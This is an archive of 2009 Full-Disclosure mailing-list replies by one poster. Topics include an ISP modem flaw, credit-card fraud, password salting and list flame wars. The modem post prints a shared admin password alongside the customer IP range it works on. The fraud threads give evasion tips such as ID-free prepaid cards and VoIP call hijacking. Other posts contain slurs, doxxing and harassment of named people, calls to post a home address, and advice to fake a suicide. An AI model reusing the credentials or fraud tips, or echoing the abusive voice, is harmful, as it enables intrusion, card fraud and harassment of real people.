On Tue, Dec 29, 2009 at 11:36 AM, Lee  wrote:
> On Tue, Dec 29, 2009 at 10:23 AM, T Biehn  wrote:
>>
>> This is an orgiastic dump of information, you must really hate ETB; or
>> you must be really excited for lulz.
>
> or you're hoping that full disclosure will get ETB to fix the problem.
>
> Regard,
> Lee
>
>>
>> -Travis
>>
>> On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo
>>  wrote:
>> > I've recently discovered a security hole on the modems (which double as
>> > routers) used by a Colombian ISP - ETB.
>> >
>> > It so happens that all incoming connections to an IP address on said ISP
>> > on port 23 or port 80 land on the modem instead of the computer(s)
>> > connected to it. Even if one tries to redirect those ports to a local
>> > machine, the modem still gets all the connections on those ports.
>> > Also, connections on ports 23 and 80, from any IP address, will access
>> > the modem configuration options. Last year that could be done only from
>> > private IP addresses (i.e. 192.168.0/24), but now it can be done, as I
>> > said, from anywhere. I've been told that a few lucky users were able to
>> > forward port 80, but in that case, it's port 8080 that is intercepted by
>> > the modem.
>> > The end result is that anyone, from anywhere, can access the modem of
>> > anyone on ETB to mess up their configuration (e.g. obtaining and changing
>> > the client's username and password, permanently disconnecting them from the
>> > internet, and so on) - that is, if they have the administration password.
>> > Unfortunately, ETB uses the same login/password on all of their modems
>> > since 2006, which are publicly available on the web.
>> > Login: Administrator
>> > Password: soporteETB2006
>> >
>> > The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that
>> > range where ports 80 and 23 are open is most likely a wide open ETB modem.
>> >
>> > Apparently, this issue has been repeatedly reported to ETB, but it
>> > always falls on deaf ears. They seem to think this is no big deal since
>> > nobody knows the username and password for the modems - which is not the
>> > case, and even if it were, they would be easily crackable by brute force.
>> >
>> > Peace,
>> >
>> > -Cilia
>> >
>> >
>> >
>> >
>> >
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] security hole on local ISP

2009-12-29 Thread T Biehn
This is an orgiastic dump of information, you must really hate ETB; or
you must be really excited for lulz.

-Travis

On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo
 wrote:
> I've recently discovered a security hole on the modems (which double as 
> routers) used by a Colombian ISP - ETB.
>
> It so happens that all incoming connections to an IP address on said ISP on 
> port 23 or port 80 land on the modem instead of the computer(s) connected to 
> it. Even if one tries to redirect those ports to a local machine, the modem 
> still gets all the connections on those ports.
> Also, connections on ports 23 and 80, from any IP address, will access the 
> modem configuration options. Last year that could be done only from private 
> IP addresses (i.e. 192.168.0/24), but now it can be done, as I said, from 
> anywhere. I've been told that a few lucky users were able to forward port 80, 
> but in that case, it's port 8080 that is intercepted by the modem.
> The end result is that anyone, from anywhere, can access the modem of anyone 
> on ETB to mess up their configuration (e.g. obtaining and changing the 
> client's username and password, permanently disconnecting them from the 
> internet, and so on) - that is, if they have the administration password. 
> Unfortunately, ETB uses the same login/password on all of their modems since 
> 2006, which are publicly available on the web.
> Login: Administrator
> Password: soporteETB2006
>
> The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that range 
> where ports 80 and 23 are open is most likely a wide open ETB modem.
>
> Apparently, this issue has been repeatedly reported to ETB, but it always 
> falls on deaf ears. They seem to think this is no big deal since nobody knows 
> the username and password for the modems - which is not the case, and even if 
> it were, they would be easily crackable by brute force.
>
> Peace,
>
> -Cilia
>
>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Global warming - it's all about the money

2009-12-20 Thread T Biehn
There are no fundamental truths. That's the only axiom you can really
rely on. The acceptance of this fact is the first on the road to
enlightenment... or Schizophrenia.

That's all for now, the suited men from a 1950's spy flick are watching
me from a vintage crown vic. Joke's on them, I've dressed my hair in
petroleum jelly.

-Travis

On Sat, Dec 19, 2009 at 4:57 PM, Stephen Mullins
 wrote:
>>...it's hard to know what's true in the comings and goings of men throughout the world
>
> Follow the money.
>
> On Tue, Dec 15, 2009 at 11:09 AM, Jared DeMott wrote:
>> Paul Schmehl wrote:
>>> http://www.wnd.com/index.php?fa=PAGE.view&pageId=118953
>>>
>>> Businesses hold world hostage over carbon credits
>>> Even U.N. climate chief tied to new, 'green' extortion scam
>>>
>>> It was never about the climate.
>>>
>>
>> Not sure about all that, but it is sad that it's hard to know what's
>> true in the comings and goings of men throughout the world.  Fortunately
>> there are fundamental Truths you can hang your hat on. ;)
>>
>>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]

2009-12-02 Thread T Biehn
Any hexadecimally represented 16 bytes is obviously an MD5.
For those interested in finding signal where there is none:
LM hashes are 16 bytes, but are actually two concatenated 8 byte DES hashes.

On Tue, Dec 1, 2009 at 2:52 PM, McGhee, Eddie  wrote:
> N3td3v i am Scottish and coming for you're boxes
>
> In yer area wee man. Fjeer.
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of genesis project
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]
>
> BEGIN TRANSMISSION
>

Re: [Full-disclosure] when I grow up

2009-10-06 Thread T Biehn
VK, obviously you don't own the account you have them send the money to.
You just happen to have an 'entangled' ATM card.

-Travis

On Tue, Oct 6, 2009 at 11:00 AM,   wrote:
> On Tue, 06 Oct 2009 10:46:19 EDT, T Biehn said:
>> Can't you make a good hunk of low-risk cash by 'pretending' to be a
>> money mule? (Profile: 20s, looking for 'easy' work.)
>
> Stealing from the old Mafia wasn't so bad.  If you got caught, it was
> usually "just business" and they dispatched you in the most economical
> way feasible.
>
> These days, the field is dominated by crazy and ruthless South American drug
> cartels, ruthless and crazy Asian Yakuza-like gangs, and *really* crazy,
> ruthless, psychopathic gangs from the Ukraine.
>
> Low risk? Hardly.
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] when I grow up

2009-10-06 Thread T Biehn
Can't you make a good hunk of low-risk cash by 'pretending' to be a
money mule? (Profile: 20s, looking for 'easy' work.)

-Travis

On Tue, Oct 6, 2009 at 8:40 AM, RandallM  wrote:
> ...when I grow up Daddy, I want to be a Money Mule!
>
> --
> been great, thanks
> a.k.a System
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Chargebacks and credit card frauds

2009-09-23 Thread T Biehn
Prepaids can be had in the US and Canada sans ID. Fake IDs cheap, easy to get.

DIDs are cheap, usually free.

How many of those nett'd households have VoIP phone service? Hijack
inbounds for re-routing to your own (free) SIP server provider?

Implementing some sort of automated call verification service is expensive, CBA?

Credit cards are insecure, you're playing cat and mouse games until
your checks become too invasive for end consumers. Perhaps you insist
on a verifying payment gateway and flag all other transactions for
manual processing in addition to adding new lists for IP checks.

Glorious,

-Travis

On Wed, Sep 23, 2009 at 11:47 AM, Anıl Kurmuş  wrote:
> As others have mentioned, you have to assume the machines are
> compromised. This means you should use another channel for
> authorization of each transaction (depending on the use of your
> website,  only authenticating the user through this channel could be
> enough but this is more risky and vulnerable).
>
> I would say the most cost effective one is probably to use SMS/cell
> phones.  You would send an SMS with the transaction details and a
> verification code to be entered on the website for finalizing the
> transaction. If the state/country given by the phone number doesn't
> match the billing address, you throw a red flag as you did before.
>
> So if an adversary wanted to cheat, he would need to enter a cell
> phone from the same region/country. Assuming he can find infested
> machines in the same country, this is not really difficult, still it's
> new and makes it harder. Of course, the main advantage is that in many
> countries, it's not easy nowadays to get a prepaid cell phone without
> giving any IDs for instance, so this might act as a deterrent. A
> better (but more expensive and slower) solution though would be to
> authenticate the cell phone number through postal mail at setup
> time/when changing the cell number.
>
>
> Anıl Kurmuş
> ---
> GPG Key :
> http://perso.telecom-paristech.fr/~kurmus/key
>
>
>
> On Tue, Sep 22, 2009 at 06:26, Steven Anders  wrote:
>> Hi everyone,
>>
>>   I work as an engineer at an online company that sells online subscription
>> service for online tool. We accept orders online using credit cards numbers
>> and we use Authorize.net to process credit card payments.
>>
>> Our standard operating procedure for online orders is: the normal checks are
>> checks of the billing address and IP address - we make sure the billing
>> address is a match and the IP address geo location is good (meaning, it is
>> pretty close to the billing city or state). We use a service called MaxMind
>> and we check to make sure that the IP address geo location is in proximity
>> to the billing address. From our experience, another big red flag is if the
>> IP is from a proxy server, or from web hosting company (could be SSH
>> tunnelling), or outside USA ( Russia, Estonia, China, etc )
>>
>>  If these checks throw a red flag, we will call the person to confirm the
>> order. With this process, we pretty much have a very low fraud rate.
>>
>>   Lately, in the past couple of months, we've been receiving a lot of orders that
>> bypass all these checks without any glitch. The AVS (Address Verification
>> Service) checks pass for the billing addresses and the IP addresses are good
>> (in proximity to the billing address). The IP addresses are near the billing
>> addresses (for example: billing address is Chicago, IL and the IP address is
>> Evanston, IL - a couple miles from Chicago).
>>
>> Only a few weeks later, we have an influx of chargebacks and phone calls
>> from the original owners of the credit cards, since these people never
>> ordered it - and they are all fraudulent orders.  The only similar pattern
>> in all these orders is that:
>>   1) they use free email accounts (from Yahoo, Hotmail, etc.).
>>   2) All the IPs are from ISPs such as Sbcglobal, Comcast, Cox
>> Communications, etc.
>>
>>   My big question is: I know there are all kinds of ways people could obtain
>> stolen credit card numbers, and their billing addresses, and so forth.
>>
>>  But. I was wondering:
>>
>> 1. how do they place the orders using all the legit IPs - since all the IPs
>> are from Sbcglobal  , Cox communications,  and all the other major ISPs near
>> the billing addresses.  Could it be that they actually took control of the
>> PCs and then steal the credit card, and then place the order remotely from
>> the controlled PC?
>>
>> 2. Any insights on how these fraudsters obtain the stolen credit card
>> numbers?
>>
>> I am now tasked with improving our backend checks to make sure we don't have
>> any more fraudulent orders, and would appreciate any pointers or insights into
>> this matter. Any theories, insights, or information would be very useful.
>>
>> Thank you all for your time in advance.
>> steve
>>
>>
>>

Re: [Full-disclosure] Chargebacks and credit card frauds

2009-09-22 Thread T Biehn
You could run IP against spam bl's, ISC lookup, dronebl, proxybl for flagging.

-Travis

On Tue, Sep 22, 2009 at 2:36 PM, Steven Anders  wrote:
> Thanks Andrew for the suggestion.
> Yes, it does make sense to do all the checks you described. These days, as
> a manual process, we just make a phone call and do a follow-up email.
> We ask for a copy of the credit card to be faxed and a proof of ID. Many
> times the fraudsters reply with very "bad English" - sometimes it is
> funny.
> And you're right - a lot of the orders are placed during non-working hours.
>
>
> On Mon, Sep 21, 2009 at 10:29 PM, Andrew Haninger 
> wrote:
>>
>> On Tue, Sep 22, 2009 at 12:26 AM, Steven Anders 
>> wrote:
>> > I am now tasked with improving our backend checks to make sure we don't
>> > have any more fraudulent orders, and would appreciate any pointers or
>> > insights into this matter. Any theories, insights, or information would
>> > be very useful.
>> I have three ideas. Two are quite complicated and the other a little
>> simpler. None are fraud-proof. Some may be impractical if your work is
>> being done "after the fact".
>>
>> 1) Have a robot call or text the customer a CAPTCHA-type string to
>> enter into a website.
>>
>> Workaround: Register a cell phone or VoIP number in the victim's area
>> code and take the call. You could possibly require a hard-wire
>> landline, but those are becoming so uncommon that it would create
>> trouble for many of your customers. And then there are those darned
>> dialup users.
>>
>> Perhaps do this only after a first "offense". Though, I'm guessing
>> fraudsters only use the accounts once and then avoid them.
>>
>> 2) Have a Flash or Java applet check for common remote desktop servers
>> running on the ordering PC.
>>
>> Workaround: Disguise the server software as something harmless, if it
>> isn't already.
>>
>> 3) Check to see if the order was placed outside normal waking hours or
>> during normal working hours.
>>
>> Workaround: Not hard to work around, but might hassle the criminals.
>>
>> Andy
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
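
The blocklist flagging suggested in the reply above can be wired into an order check as follows. This is an added example, not code from the thread: the zone list, the function names and the `FAKE_DNS` table are assumptions, and the lookup table is constructed so the block runs offline.

```python
import ipaddress
import socket

# Assumed zone list for illustration; dnsbl.dronebl.org is DroneBL's public zone.
DNSBL_ZONES = ("dnsbl.dronebl.org",)
DNSBL_ANSWER_NET = ipaddress.ip_network("127.0.0.0/8")


def dnsbl_query_name(ip, zone):
    """IPv4 DNSBL convention: 1.2.3.4 in zone -> 4.3.2.1.zone."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def system_resolver(name):
    """Return the A record as a string, or None when the name does not exist."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror as exc:
        if exc.errno in (socket.EAI_NONAME, getattr(socket, "EAI_NODATA", object())):
            return None          # NXDOMAIN: the address is not listed
        raise                    # timeouts and server failures are not "clean"


def check_order_ip(ip, zones=DNSBL_ZONES, resolver=system_resolver):
    """Classify the ordering IP as 'flag', 'unknown' or 'clear'."""
    result = {"ip": ip, "listed_in": [], "errors": []}
    for zone in zones:
        try:
            answer = resolver(dnsbl_query_name(ip, zone))
        except OSError as exc:   # gaierror and TimeoutError are OSError subclasses
            result["errors"].append(f"{zone}: lookup failed ({exc})")
            continue
        if answer is None:
            continue
        # Real DNSBL answers sit in 127.0.0.0/8. Anything else is usually a
        # resolver rewriting NXDOMAIN and must not be counted as a listing.
        if ipaddress.ip_address(answer) in DNSBL_ANSWER_NET:
            result["listed_in"].append((zone, answer))
        else:
            result["errors"].append(f"{zone}: unexpected answer {answer}")
    if result["listed_in"]:
        result["verdict"] = "flag"       # route to the manual phone check
    elif result["errors"]:
        result["verdict"] = "unknown"    # do not treat a failed lookup as a pass
    else:
        result["verdict"] = "clear"
    return result


# Constructed lookup table standing in for DNS (documentation addresses only).
FAKE_DNS = {
    "10.2.0.192.dnsbl.dronebl.org": "127.0.0.3",      # constructed listing
    "11.2.0.192.dnsbl.dronebl.org": "203.0.113.80",   # constructed NXDOMAIN rewrite
}


def fake_resolver(name):
    if name.startswith("12."):
        raise TimeoutError("constructed timeout")
    return FAKE_DNS.get(name)


if __name__ == "__main__":
    for order_ip in ("192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.13"):
        print(check_order_ip(order_ip, resolver=fake_resolver))
```

A listing is one more signal for the manual review queue next to the AVS and geolocation checks described in the thread; residential bot hosts are often unlisted, so a "clear" verdict does not vouch for the order.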



Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-17 Thread T Biehn
Mapping weev->IRL has no real impact, as he has either an entirely
different identity or a DBA, if this was a fictional account on weev's
part it would be certainly easy, effective, and feasible for him to
change a single letter in his name.

For the next part, you might want to grab some calming tea or something...

If you've achieved anything it's angering his online persona, these
typically only become a bit more malicious and difficult to catch.
You've succeeded only in creating an even larger 'weev.'
Try posting a home address next time.
For bonus points engineer some sort of scheme where the hive becomes
enraged and R4L's him.
It's been done before, and will be done again by those with real 'talent.'

Given that weev has demonstrated competency in all the above I think
it prudent that you not associate this "disclosure" to any of your
other online identities. (Brag on IRC already? Who did you work with?
You seem to be somewhat close to weev, enough to have a personal
vendetta against him, do you know that everyone you've talked with
actually hates the guy enough not to drop your pseudonym?)

-Travis

On Wed, Sep 16, 2009 at 8:52 PM, zewbiec...@gmail.com
 wrote:
> what does google earth have to do with any of this?
>
> On 9/16/09, GOBBLES  wrote:
>> What do you mean Sherrod *was* a fed?
>>
>> Obviously the point wasn't to ruin. The point was to salt the earth by
>> filling google with your real name.
>>
>> I can now officially say the (Google) Earth has been salted for you. You'll
>> never be able to live a real life again. You'll always be hiding in the
>> shadows for the rest of your life now.
>>
>> It may not hit you now, but eventually you'll feel suffering and despair.
>>
>> I'm the one who helped in the process of clipping your wings to keep you
>> grounded. To leave you in the world where mediocrity will never come.
>>
>> You are a monster for what you did to Kathy... She's a great UX designer and
>> a beautiful woman...
>>
>> Sincerely,
>>
>> Tim O'Reilly
>>
>> Btw all dogs go to heaven was awesome you fucking faggot
>>
>>  Original Message 
>> From: Andrew A 
>> To: GOBBLES 
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
>> Date: Tue, 15 Sep 2009 23:52:42 -0500
>>
>>> Okay. You've been in contact with Hep? She's handed over her logs? Oh
>>> man, the FBI now has hundreds of megs of me scrolling ansi on IRC,
>>> telling her she's a sickly withered ghoul, calling her fat, and making
>>> fun of her Springeresque living situation of having 3 different kids
>>> by 3 different dads (seriously hep is basically the hip web2.0 version
>>> of used up trailer trash whore).
>>>
>>> Oclet's handed over his logs? Wow, the FBI now has records of all the
>>> times I've told him to stop doing cocaine and drinking and clean up
>>> his act.
>>>
>>> Sherrod DeGrippo was indeed a fed. If she's turned against me, the FBI
>>> now has all the records of me posting the information of people with
>>> autism to Encyclopedia Dramatica! I'm goin' down!
>>>
>>> Tehdely, the gay San Francisco Jew who works for blogging house Six
>>> Apart will be able to tell a jury that I, in the haze of a 5-balloon
>>> dose of nitrous oxide, did a "sieg heil" salute and shouted "heil
>>> hitler" while giggling hysterically. I, clearly, will be screwed by
>>> this revelation of SECRET KNOWLEDGE in the grand jury proceedings.
>>>
>>> And actually, you can make your living off of advertising and selling
>>> t-shirts. I made high sfigs off of direct marketing alone for several
>>> years.
>>>
>>> You antis are pathetic. You think you got one up on me by pasting some
>>> fuckin info I put in my fuckin LIVEJOURNAL? Is this what hackin is
>>> these days? Are you gonna start syndicating emo rants from 14 year old
>>> girls into f-d posts with ascii banners at the top, acting like you
>>> owned people?
>>>
>>> See, for a doxdrop to be proper, you have to do info that is not
>>> already public, and you have to tie it together in a way that reveals
>>> something about their lives that they did not want people to know.
>>>
>>> For example, when some clever soul revealed that Rob Levin of freenode
>>> didn't actually live in a trailer, had all sorts of welfare and was
>>> still using people's donations to supplement his income, that was a
>>> pretty sweet doxdrop:
>>> http://antisec.wordpress.com/2006/06/27/eyeballing-rob-levin/
>>>
>>> Or when somebody pieced together Kathy Sierra's sordid history of dick
>>> sucking, that was pretty fuckin' awesome:
>>> http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2007-03/msg00507.html
>>>
>>> You, sir, are a fucking amateur. You haven't uncovered anything new
>>> (the most well funded law enforcement organization in the world had to
>>> do that for you in their organized campaign, and you copied it from my
>>> livejournal), and it is certainly not anything I tried to hide, as I
>>> put it in my fucking blog. No secrets 

Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

2009-09-10 Thread T Biehn
MrX,
Dude.
Just fake your own suicide. This old school trick will solicit the
feds to your locale if you're actually being watched.

Other advice?

I want voice recordings, jpegs, vlog posts, else it didn't happen &
you're schizoid.

-Travis

On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald
 wrote:
> TheLearner wrote:
>
> <>
>> What would you do?
>
> I'm not sure what _I_ would do facing such a crisis, but I think the
> best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer
> (s/he has been posting to this list lately, so should be easy to track
> down), and then get those two uber hackers to help as well -- they'll
> be much more help _to you_ than any private eye ever will...
>
>
>
> Regards,
>
> Nick FitzGerald
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Time to stop this non-sense

2009-08-28 Thread T Biehn
That's cool, your mom still 

superfluous.

-Travis

On Fri, Aug 28, 2009 at 12:50 PM, Gavin wrote:
> 2009/8/28 T Biehn :
>> Dear Gavin:
>>
>> My internet pseudonym is List.
>> I suggest that you stop spreading libel about me on the internet or I
>> will be forced to hire internet police and ruin your life.
>>
>> FOREVER.
>>
>> -Travis
>
> Not before I pwn your Grandma's PC and divert your weekly allowance. ;)
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Time to stop this non-sense

2009-08-28 Thread T Biehn
Dear Gavin:

My internet pseudonym is List.
I suggest that you stop spreading libel about me on the internet or I
will be forced to hire internet police and ruin your life.

FOREVER.

-Travis

On Fri, Aug 28, 2009 at 10:32 AM, Gavin wrote:
> Is this list all parody or wtf ???
>
> 2009/8/28 jamesleesmit...@aol.co.uk :
>> Hi
>>
>> I suggest whoever is trying to give n3td3v a bad name stop.
>>
>> James
>>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Sexless schadenfreude: the potential extremist Michael Crook.

2009-08-25 Thread T Biehn
I'm sure the man already has his big eye on Michael, especially since
his last name is Crook, these are facts they wouldn't miss.

On Tue, Aug 25, 2009 at 10:49 AM,  wrote:
> On Tue, 25 Aug 2009 10:07:07 -, Michael Crook said:
>
>> ~ John Doe / n3td3v (http://www.twitter.com/n3td3v)
>>
>> P.S. This is an anonymous,
>
> Hint: Look up big words like "anonymous" in the dictionary, make sure
> you're using them correctly. It adds that extra luster of competence to
> your postings.
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Questions for the iProphet

2009-08-21 Thread T Biehn
"Do what thou wilt shall be the whole of the law"

On Fri, Aug 21, 2009 at 11:16 AM, Paul Schmehl  wrote:
>
> --On Friday, August 21, 2009 04:03:40 -0500 netdev.doc...@hushmail.com wrote:
>
> >
> > Hey weev.
> >
> > Now that the FBI and everything are all out to get you, I was
> > wondering what life on the lamb was like.
>
> Wouldn't life on the lamb be sheepophilia?  Wouldn't it be better to have life
> on the sheep, if you're so inclined?
>
> Or did you mean life on the lam?
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
>



--
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Slander of security researcher n3td3v

2009-08-11 Thread T Biehn
Very exclusive membership of notable fallators. Avoid option 5.

-Travis

On Tue, Aug 11, 2009 at 5:00 PM,  wrote:
> Tell your faggot friend he can't be in our club.
>
> On Tue, 11 Aug 2009 16:24:09 -0400 someone lawyer
>  wrote:
>>List,
>>
>>My client is genuine, he has never been part of anti-sec.
>>
>>some...@lawyer.com
>>



-- 
pgp http://pastebin.com/f6fd606da pgp



Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
Thank you for the thoughtful analysis Raid. The hash and salt are both
known to the attacker :)
It looks like I'm going to have to settle with confounding efforts by
the man via increased hash computation cost.

-Travis

On Mon, Aug 10, 2009 at 6:53 PM,  wrote:
> Travis,
>
> On Mon, 10 Aug 2009 22:50:32 +0200 T Biehn  wrote:
>>I don't have control over the set. Sorry I wasn't more explicit
>>about
>>this. Although, it should have been obvious that the solution
>>needed
>>to satisfy the conditions:
>>Data to one way hash.
>>The set has 9,999,999,999 members.
>
> if these are the only two conditions, I wonder why a static salt
> does not satisfy your requirements? If the salt is not publicly
> known, the procedure is secure in respect to the hash-function in
> use...
>
> So, suppose the third condition is the salt may be publicly known.
>
> Suppose, we have plaintext (alphabet E, length of alphabet s = |E|)
> with fixed length, say 'c' chars. So if you insert the salt at a
> random position, there are c+1 possibilities for the position of
> the salt. So the bruteforce attacker has to run c more tests than
> having the salt in a fixed position.
>
> Comparing the two procedures from a theoretical view, there isn't
> a significant difference in terms of runtime complexity:
>
> If the salt is not publicly known and at a fixed position,
> complexity (means: number of possible plaintexts) is at O(s**c).
> Your method only raises complexity by a constant factor: It's at O(
> (c+1) * s**c).
>
> Theoretically this is negligible: If it takes me 2 hours to
> bruteforce procedure 1 (fixed position), why bother about 20 hours
> computing for procedure 2?
>
> Practically it depends on your overall requirements.
>
> Besides, your procedure lowers the latch for DoS... at least
> slightly (same argument as above).
>
> So far, my two cents...
>
> raid



-- 
pgp http://pastebin.com/f6fd606da pgp
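
The trade-off discussed in this message, and in the pseudocode message further down the thread, can be measured directly. This is an added example, not code from the thread: the function names, the 3-digit toy ID space and the use of PBKDF2 as the "increased hash computation cost" are assumptions; only the salt value is taken from the original post.

```python
import hashlib
import hmac

SALT = b"329938255"   # salt value from the thread's example
DIGITS = 3            # constructed toy space (10**3 IDs) so the demo runs in seconds
ITERATIONS = 2000     # assumed stretch factor for the demo; real systems use far more


def protect_fixed(member, salt=SALT):
    """Salt appended at a fixed position: one hash per guess."""
    return hashlib.sha256(member + salt).digest()


def protect_floating(member, pos, salt=SALT):
    """Salt spliced in at position pos (0..len(member)), as proposed in the thread."""
    return hashlib.sha256(member[:pos] + salt + member[pos:]).digest()


def protect_stretched(member, salt=SALT, iterations=ITERATIONS):
    """Key stretching: each guess costs `iterations` HMAC rounds."""
    return hashlib.pbkdf2_hmac("sha256", member, salt, iterations)


def verify_floating(member, stored, salt=SALT):
    """Server-side check for the floating scheme: returns (ok, hashes_computed)."""
    calls = 0
    for pos in range(len(member) + 1):
        calls += 1
        if hmac.compare_digest(protect_floating(member, pos, salt), stored):
            return True, calls
    return False, calls


def candidates(digits=DIGITS):
    for n in range(10 ** digits):
        yield str(n).zfill(digits).encode()


def crack_fixed(stored):
    calls = 0
    for m in candidates():
        calls += 1
        if protect_fixed(m) == stored:
            return m, calls
    return None, calls


def crack_floating(stored):
    # Salt and hash are known to the attacker, so only the position is extra work.
    calls = 0
    for m in candidates():
        for pos in range(len(m) + 1):
            calls += 1
            if protect_floating(m, pos) == stored:
                return m, calls
    return None, calls


def crack_stretched(stored, iterations=ITERATIONS):
    calls = 0
    for m in candidates():
        calls += iterations
        if protect_stretched(m, iterations=iterations) == stored:
            return m, calls
    return None, calls


if __name__ == "__main__":
    secret = b"999"   # worst case for an ascending search
    print("fixed    :", crack_fixed(protect_fixed(secret)))
    print("floating :", crack_floating(protect_floating(secret, len(secret))))
    print("stretched:", crack_stretched(protect_stretched(secret)))
    # Same ratios at the thread's scale: 10**10 IDs of length c = 10.
    space, c = 10 ** 10, 10
    print("full scale:", space, space * (c + 1), space * ITERATIONS)
```

The floating salt multiplies the attacker's work by c+1 and charges the verifier the same c+1 hashes on every check, which is the DoS point raised in the quoted analysis; the iteration count is a tunable factor that can be raised far beyond c+1.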



Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
Valdis,
I don't have control over the set. Sorry I wasn't more explicit about
this. Although, it should have been obvious that the solution needed
to satisfy the conditions:
Data to one way hash.
The set has 9,999,999,999 members.

Thanks for your input sweetie!

-Travis

On Mon, Aug 10, 2009 at 4:26 PM,  wrote:
> On Sun, 09 Aug 2009 20:14:57 EDT, T Biehn said:
>> Soliciting random suggestions.
>> Let's say I have data to one-way-hash.
>> The set has 9,999,999,999 members.
>
> Actually, if you're using a 10-digit decimal field, you probably have 10**10
> possible members - all-zeros counts too (unless there's *other* reasons zero
> isn't a legal ID).  It's those little off-by-one errors that tend to get you.
> ;)
>
>> It's relatively easy to brute force this, or create precomp tables.
>
> That's because you only have 10M billion members to brute force against.
>
>> So you add a salt to each.
>
> A better idea cryptographically would be to fix the 10**10 member limit, so
> that the set *could* have a much higher possible number of members.  Even
> staying at 10 characters, but allowing [A-Za-z0-9] (62 possible chars) raises
> your space to 62**10 or about 8.3*10**17 (or almost 10M times the difficulty).
> That's why most symmetric crypto algorithms use at least 64-bit or even larger
> keys, and even larger for RSA and similar public-key systems.
>
>



-- 
pgp http://pastebin.com/f6fd606da pgp



Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
I'm flattered; If you only knew what it was for...
IHBT?

-Travis

On Mon, Aug 10, 2009 at 12:08 PM,  wrote:
> AntiSec would like to approach you by telling you to keep your
> whitehat filthy ass off our list, Travis.
>
> Have a nice day sucking off Aitel.
>
> On Sun, 09 Aug 2009 20:14:57 -0400 T Biehn  wrote:
>>Soliciting random suggestions.
>>Lets say I have data to one-way-hash.
>>The set has 9,999,999,999 members.
>>It's relatively easy to brute force this, or create precomp
>>tables.
>>So you add a salt to each.
>>Still easy to brute force.
>>If you were to create it in such a way that the hash could exist
>>anywhere in the set member, does this increase the cost of
>>computation
>>enough?
>>
>>That is, consider a member 'abcdefg' with salt 329938255.
>>When authenticating against the server, it must permute over all
>>possible combinations of the salt and the set member in order to
>>determine the validity of the password.
>>
>>If anyone has a better approach, or would like to approach me off
>>list, or knows of a list more suited to these queries please feel
>>free
>>to redirect me :)
>>
>>-Travis
>>


Re: [Full-disclosure] Ureleet is the Anti-Sec

2009-08-10 Thread T Biehn
